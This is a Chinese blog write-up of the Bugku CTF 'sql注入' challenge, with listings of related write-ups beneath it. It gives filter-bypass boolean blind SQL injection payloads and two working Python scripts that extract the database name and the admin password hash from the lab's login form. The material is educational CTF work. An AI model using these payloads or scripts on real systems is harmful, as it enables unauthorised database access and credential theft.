Bugku sql注入

最新推荐文章于 2025-05-15 17:46:59 发布
最新推荐文章于 2025-05-15 17:46:59 发布
阅读量1.4k 收藏 8
点赞数 4
CC 4.0 BY-SA版权
分类专栏: 暑假第一周作业 文章标签: sql 数据库 spring
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_63253040/article/details/125955031

进入环境是个登录页面

提示这题布尔盲注,先fuzz一波

 过滤了length,like,information,and,union,select,order,where等等

用括号绕过空格,我们发现能用的字符有<>,or,'

先万能密码试试看,<>是不等于的意思

'or(1<>2)#

 'or(1<>1)#

 可以确定这里有布尔盲注

那么开始注入 参考博客

'or(length(database())>7)# 回显password error!
'or(length(database())>8)# 回显username does not exist!

说明数据库长度为7

后面爆数据库

利用reverse和from

a'or(ascii(substr(reverse(substr((database())from(1)))from(8)))<>98)#

最后利用脚本爆出数据库

import requests

url='http://114.67.175.224:19015/index.php'

database=''

for i in range(1,9):
    for p in range(45,126):
            m=9-i
            sql="a'or(ord(substr(reverse(substr((database())from(%d)))from(%d)))<>%s)#"%(i,m,p)
            data={
                'username':sql,
                'password':'1'
                }
            res=requests.post(url=url,data=data)
            if "username does not exist!" in res.text:
                database+=chr(p)
                print (database)
                break
print ("==========================")
print("\n"+database)

 得到数据库后面因为fuzz后发现过滤了太多字符,所以这里根据参考博客是用字典跑出数据表和字段,这里先跳过

得到数据表admin和字段名password后

爆破密码

password=''

for i in range(1,33):
    for p in range(45,126):
            m=33-i
            sql="a'or(ord(substr(reverse(substr((select(group_concat(password))from(blindsql.admin))from(%d)))from(%d)))<>%s)#"%(i,m,p)
            data={
                'username':sql,
                'password':'1'
                }
            res=requests.post(url=url,data=data)
            if "username does not exist!" in res.text:
                password+=chr(p)
                print (password)
                break
print ("==========================")
print("\n"+password)

 解md5  4dcc88f8f1bc05e7c2ad1a60288481a2

 得到密码bugctf

去登录 账号是admin

 

一次简单的sql注入 bugku 成绩查询
jzw0831的博客
11-06 1209
一次简单的sql注入 bugku 成绩查询
bugku ctf sql注入2
qq_42777804的博客
08-08 3170
全都tm过滤了绝望吗? 提示 !,!=,=,+,-,^,% 骑士 特别特别  绝望         输入什么都不行     直接 在网址后面 添加   flag  (老师指点)    敲回车 发现会多了个这个 哈哈哈   记事本打开    发现这不就是  flag  吗   如下  flag{sql_iNJEct_comMon3600!} 提交即可...
bugku--SQL注入((利用脚本))
hxhabcd123的博客
08-28 2011
本文记录利用脚本来解决SQL注入的CTF题
CTF Web BugKu sql注入(布尔盲注+绕过)
最新发布
2301_79806187的博客
05-15 1001
尝试username=admin,显示“password error!尝试username=hhh,显示“username does not exist!尝试username=hhh'or'1显示“password error!”,那么注入点在username中,布尔盲注。构建注入语句的时候发现还会回显illegal character,说明有过滤。利用bp和sql字符过滤字典初步筛选出过滤的字符,如下图后来尝试的时候又发现了for也被过滤了。我的思路:布尔盲注的两个关键点就是截取字符串和比较。
Bugku WEB sql注入
qq_41696858的博客
07-27 677
明显的布尔盲注。md5值和之前的一样,bugkuctf 这题也是过waf题,具体过滤了哪些字符可以用burpsuite跑个字典看看。 然后就是#,substr这两个关键的函数没有进行过滤,那么可以根据这个构造payload,由于空格被过滤了,所以,考虑用()代替空格 把上一题的脚本改改,爆破出密码来,那就可以直接提交得到flag了 import requests #password一般由大小写字母和数字组成 allString = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJK
BugkuCTF sql注入
weixin_34413065的博客
05-04 388
前言 写了这么久的web题,算是把它基础部分都刷完了一遍,以下的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每道题的题解都以单独一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~ 点开链接一看 很明显可以看出查询key表,id=1的string字段 我们去构造payload: http://103.238.227.13:10083/inde...
BugKusql注入
D-R0s1的博客
08-08 990
       今天和大家分享一道BugKu中关于sql注入的题目,在web题中,sql注入的相关知识可以说随处可见了,在这里咱们就就题论题不做其他的拓展和延伸了。        拿到题以后,还是老套路,and 1=1和and 1=2 看看是否带入查询,但是这个题目在?id=1和?id=1'两种条件下都不报错,查看页面源代码发现gb2312于是尝试宽字节注入。?id=1%bf' union sel...
【CTF bugku 成绩查询】关于sql注入
zw05011的博客
01-17 729
知识点 sql注入基础原理(超详细) - 简书一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最...https://www.jianshu.com/p/078df7a35671通过1和1'查看返回值,确定注入 通过1' order by 1#、1' order by 2#直到确定为几列 通过联合查询 1' union select database(),user()#进行查询
Bugku成绩查询:一次简单的SQL注入过程
xhxtalent的博客
10-20 590
1很重要,一般来说在数据库中id不会有等于负数的,所以union联合查找前面部分的是错误的,故就是显示后面的查询内容,不然不会显示后面的查询内容的。一共查询到两个表名,分别是fl4g和sc表,我们需要但是flag,很大概率在fl4g表中,所以优先查询fl4g表的内容。查询到字段名为“skctf_flag”,那么就直接查询该字段的数据就能得到想要的了。and 1=2返回错误了,说明存在注入点的。递增上去,如果页面如果出现了错误,那么字段数就是当前的数字减1。分别输入1,2,3返回的是不同人名的成绩单。
bugku 成绩查询(sql
qq_63875498的博客
12-04 927
bugku 成绩查询(sql
sql注入——bugku
weixin_34417814的博客
07-12 261
刚刚做了bugku的题目,现在整理一下 写出解题思路,希望能够帮助到那些需要帮助的人 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! 永远爱你们的————新宝宝 Challenge 1345 Solves sql注入 50 http://103.238.2...
Bugku sql注入 基于布尔的SQL盲注 经典题where information过滤
m0_64180167的博客
10-16 1168
考核中遇到的题 爆出数据库 就完全不知道怎么做了这里拿到原题记录一下首先拿到登入界面我们来进行测试输入 admin 密码随便输入输入 admin123 密码随便输入发现了 这里admin是存在数据库中的 但是不存在就会回显不存在所以这里我们可以确定了 admin 是true的然后我们开始fuzz发现过滤了巨多。。。。。where information啥都是过滤然后我们一个一个绕过。
BugkuCTF SQL注入1
weixin_34397291的博客
05-06 279
前言 写了这么久的web题,算是把它基础部分都刷完了一遍,以下的几天将持续更新BugkuCTF WEB部分的题解,为了不影响阅读,所以每道题的题解都以单独一篇文章的形式发表,感谢大家一直以来的支持和理解,共勉~~~ 我们点开链接,里面有段这样的代码: //过滤sql $array = array('table','union','and','or','load_file','cre...
bugku成绩单(sql注入)writeup_sql注入 bugku
2501_90256529的博客
01-20 1085
名为“mysql.procname”的列指明了对应于INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列。名为“mysql.procname”的列指明了对应于INFORMATION_SCHEMA.ROUTINES表的mysql.proc表列。TABLES表:提供了关于数据库中的表的信息(包括视图)。TABLE_PRIVILEGES(表权限)表:给出了关于表权限的信息。SCHEMA_PRIVILEGES(方案权限)表:给出了关于方案(数据库)权限的信息。
bugku-web-SQL注入
qq_75121443的博客
04-18 376
这里利用ASCII码对数据库名称进行提取,得到第一个为ASCII码99,得到为字母b。得到=、空格、and、+、,、()等关键字全被过滤。这里稍微测试后,直接得到正确账号名admin。这也太过分了,连逗号都过滤了。,可以使用from(1)解决。以此继续,得到password。空格可以使用or()解决。
Bugku SQL注入2
小白渣的博客
09-18 876
这道题目属实有点牛逼 1.直接 即可得到 flag 2.这加粗样式道题属于典型的DS_Store源码泄露,当然还有其他类型(常见web源码泄露总结)(常见的web源码泄露总结). 结果用御剑和bp爆口令好像都无果 ...
Bugku sql注入 基于布尔的SQL盲注
plant1234的博客
06-21 4541
sql注入
SQL注入1——bugku
weixin_34075268的博客
07-12 173
刚刚做了bugku的题目,现在整理一下 写出解题思路,希望能够帮助到那些需要帮助的人 所有的wp都是以一题一篇的形式写出 主要是为了能够让读者更好的阅读以及查找, 希望你们不要责怪!!共勉!!! 永远爱你们的————新宝宝 Challenge 1144 Solves SQL注入1 60 地址:http://103.238.227.1...
【CTF-web】bugku-成绩查询(sql注入
Sankkl1的博客
08-17 856
再测试,当id为1’时,无数据,而当id为1’#时,又正确返回了数据,推测构造的数据库查询语句可能是类似。查询skctf库中的表的名称,结果其中有一个表名为fl4g,很可能其中就包含了flag。查询fl4g表中的列名,发现其中有一列的名称为skctf_flag。如上图所示,当id为1时返回名字为“龙龙龙”的成绩单。我们要找到能返回能够返回我们需要的信息的位置,当。时,数据不显示,可以知道一列数据有4列。时,我们可以查询到库名,如下图所示。这样的,其中XX为传入的参数。时,可以正常显示,直到。
sql注入 bugku
04-02
嗯,用户想了解关于SQL注入的教程或实例,特别是和Bugku平台相关的。首先,我需要回忆一下SQL注入的基本原理,然后结合Bugku的实例来讲解。用户可能是个刚开始学习网络安全的新手,所以需要从基础开始解释,确保他...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值